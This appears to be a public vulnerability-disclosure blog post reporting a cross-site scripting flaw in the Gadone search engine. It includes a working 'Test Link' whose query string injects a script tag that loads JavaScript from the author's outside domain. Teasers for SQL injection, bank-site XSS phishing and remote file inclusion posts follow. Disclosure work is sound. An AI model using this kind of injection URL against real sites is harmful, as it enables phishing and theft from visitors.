PlanetCreator has reported another critical XSS Vulnerability on Gadone (beta) MM Search Engine : http://www.gadone.com

This vulnerability has been informed to :- webmaster

Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications that enables malicious attackers to inject client-side script into web pages viewed by other users. An exploited cross-site scripting vulnerability can be used by attackers to bypass access controls such as the same origin policy.

Test Link

http://www.gadone.com/search?q=%22%3E%3Cscript%20src=%22http://www.planetcreator.net/attacking/xss/planetcreator-xss.js%22%20%3C/script%3E

We hope that your security staff will look into this issue and fix it as soon as possible.

Explore More

Critical Blind SQL Injection in MRTV4 (Myanmar)

PlanetCreator reported another Critical Blind SQL injection (vulnerability) on MRTV4 (Myanmar) URL : http://www.mrtv4.net.mm/ SQL injection is a code injection technique that exploits a security vulnerability occurring in the database

Read More

Fake Login Page with XSS – IFRAME – | C B Bank – Online Electricity Billing Payment System(GBPS)

When XSS vulnerabilities on bank websites are exploited by phishers, is too late to undo the unwanted consequences. The phishers were able to inject a modified login form onto the

Read More

Basic Remote File Inclusion

Basic Remote File Inclusion DefinitionRemote file inclusion, commonly known as RFI is a form of attack where the attacker trys to inject there own php code inside your php app’s.

Read More